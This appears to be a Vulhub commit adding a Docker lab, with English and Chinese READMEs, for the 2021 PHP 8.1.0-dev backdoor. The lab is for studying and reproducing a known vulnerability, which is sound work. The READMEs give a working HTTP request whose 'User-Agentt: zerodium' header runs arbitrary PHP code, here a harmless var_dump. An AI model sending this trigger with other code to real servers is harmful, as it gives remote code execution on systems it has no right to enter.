first commit
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled
This commit is contained in:
BIN
php/8.1-backdoor/1.png
Normal file
BIN
php/8.1-backdoor/1.png
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 39 KiB |
40
php/8.1-backdoor/README.md
Normal file
40
php/8.1-backdoor/README.md
Normal file
@@ -0,0 +1,40 @@
|
||||
# PHP 8.1.0-dev User-Agentt Backdoor Remote Code Execution
|
||||
|
||||
[中文版本(Chinese version)](README.zh-cn.md)
|
||||
|
||||
PHP version 8.1.0-dev was implanted with a backdoor on March 28, 2021, but the backdoor was quickly discovered and removed. When this backdoor is present on a server, an attacker can execute arbitrary code by sending a **User-Agentt** header.
|
||||
|
||||
References:
|
||||
|
||||
- https://news-web.php.net/php.internals/113838
|
||||
- https://github.com/php/php-src/commit/c730aa26bd52829a49f2ad284b181b7e82a68d7d
|
||||
- https://github.com/php/php-src/commit/2b0f239b211c7544ebc7a4cd2c977a5b7a11ed8a
|
||||
|
||||
## Vulnerable Environment
|
||||
|
||||
Start a PHP 8.1-dev server with the backdoor.
|
||||
|
||||
```
|
||||
docker compose up -d
|
||||
```
|
||||
|
||||
After the environment is started, the service runs at ``http://your-ip:8080``.
|
||||
|
||||
## Vulnerability Reproduce
|
||||
|
||||
Send the following request to execute the code `var_dump(233*233);`:
|
||||
|
||||
```
|
||||
GET / HTTP/1.1
|
||||
Host: localhost:8080
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept: */*
|
||||
Accept-Language: en
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
|
||||
User-Agentt: zerodiumvar_dump(233*233);
|
||||
Connection: close
|
||||
|
||||
|
||||
```
|
||||
|
||||
|
||||
38
php/8.1-backdoor/README.zh-cn.md
Normal file
38
php/8.1-backdoor/README.zh-cn.md
Normal file
@@ -0,0 +1,38 @@
|
||||
# PHP 8.1.0-dev User-Agentt 后门导致远程代码执行漏洞
|
||||
|
||||
PHP 8.1.0-dev 版本在2021年3月28日被植入后门,但是后门很快被发现并清除。当服务器存在该后门时,攻击者可以通过发送**User-Agentt**头来执行任意代码。
|
||||
|
||||
参考链接:
|
||||
|
||||
- https://news-web.php.net/php.internals/113838
|
||||
- https://github.com/php/php-src/commit/c730aa26bd52829a49f2ad284b181b7e82a68d7d
|
||||
- https://github.com/php/php-src/commit/2b0f239b211c7544ebc7a4cd2c977a5b7a11ed8a
|
||||
|
||||
## 漏洞环境
|
||||
|
||||
执行如下命令启动一个存在后门的PHP 8.1服务器:
|
||||
|
||||
```
|
||||
docker compose up -d
|
||||
```
|
||||
|
||||
环境启动后,服务运行在`http://your-ip:8080`。
|
||||
|
||||
## 漏洞复现
|
||||
|
||||
发送如下数据包,可见代码`var_dump(233*233);`成功执行:
|
||||
|
||||
```
|
||||
GET / HTTP/1.1
|
||||
Host: localhost:8080
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept: */*
|
||||
Accept-Language: en
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
|
||||
User-Agentt: zerodiumvar_dump(233*233);
|
||||
Connection: close
|
||||
|
||||
|
||||
```
|
||||
|
||||
|
||||
8
php/8.1-backdoor/docker-compose.yml
Normal file
8
php/8.1-backdoor/docker-compose.yml
Normal file
@@ -0,0 +1,8 @@
|
||||
version: '2'
|
||||
services:
|
||||
web:
|
||||
image: vulhub/php:8.1-backdoor
|
||||
volumes:
|
||||
- ./index.php:/var/www/html/index.php
|
||||
ports:
|
||||
- "8080:80"
|
||||
2
php/8.1-backdoor/index.php
Normal file
2
php/8.1-backdoor/index.php
Normal file
@@ -0,0 +1,2 @@
|
||||
<?php
|
||||
echo "hello world";
|
||||
Reference in New Issue
Block a user